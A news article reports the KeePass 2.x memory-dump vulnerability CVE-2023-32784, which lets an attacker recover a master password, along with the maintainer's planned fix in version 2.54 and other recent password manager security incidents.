A security researcher has uncovered a significant vulnerability in the popular KeePass open-source password manager, according to reports. The flaw, which is present in versions of KeePass 2.X for Linux, macOS and Windows, allows attackers to retrieve a targeted victim’s master password via a memory dump, even when the user’s workspace is closed. KeePass’ maintainer has developed a fix for the vulnerability, which is set to be included in version 2.54 of the software set to be released early next month.
The researcher who discovered the issue, tracked as CVE-2023-32784, has already released a proof-of-concept on GitHub. The researcher, using the name vdhoney, said that an attacker could retrieve the master password even if the user had locked the workspace and when KeePass was no longer running. Vdhoney added that while the flaw requires an attacker with read access to a host’s filesystem or RAM, that is often not a hurdle, as remote attackers can gain access via vulnerability exploits or phishing, among other methods.
The vulnerability is related to how a KeePass custom box for entering passwords called “SecureTextBoxEx” processes user input. When a user types a password, leftover strings from the process can allow an attacker to construct the password in clear text. For example, typing the word “password” results in the leftover strings “•a”, “••s”, “•••s”, “••••w”, “•••••o”, “••••••r”, “•••••••d”.
KeePass’ maintainer, Dominik Reichl, acknowledged the issue in a SourceForge discussion thread and said two enhancements to the password manager to address the problem would be included in the next KeePass release (2.54), along with other security-related features. Reichl initially indicated that would happen sometime in the next two months but later revised the estimate delivery date for the new version to early June. Reichl added that “a realistic estimate for the KeePass 2.54 release probably is ‘in the beginning of June’ (i.e. 2-3 weeks), but I cannot guarantee that.”
This is the second recent security issue uncovered with KeePass, with researcher Alex Hernandez in February demonstrating how an attacker with write access to KeePass’ XML configuration file could edit it in a way that retrieved clear-text passwords from the password database and silently exported them to an attacker-controlled server. That vulnerability received a formal identifier, CVE-2023-24055, although KeePass disputed the description.
The new vulnerability in KeePass is likely to spark further discussions around password manager security, which have increased in recent months. These incidents have highlighted security issues surrounding major password manager technologies. In December, LastPass disclosed an incident where a threat actor, using credentials from a previous intrusion at the company, accessed customer data stored with a third-party cloud service provider. Researchers at Google warned in January about password managers, such as Bitwarden, Dashlane and Safari Password Manager, auto-filling user credentials without prompting on untrusted pages. Meanwhile, threat actors have increased attacks on password manager products.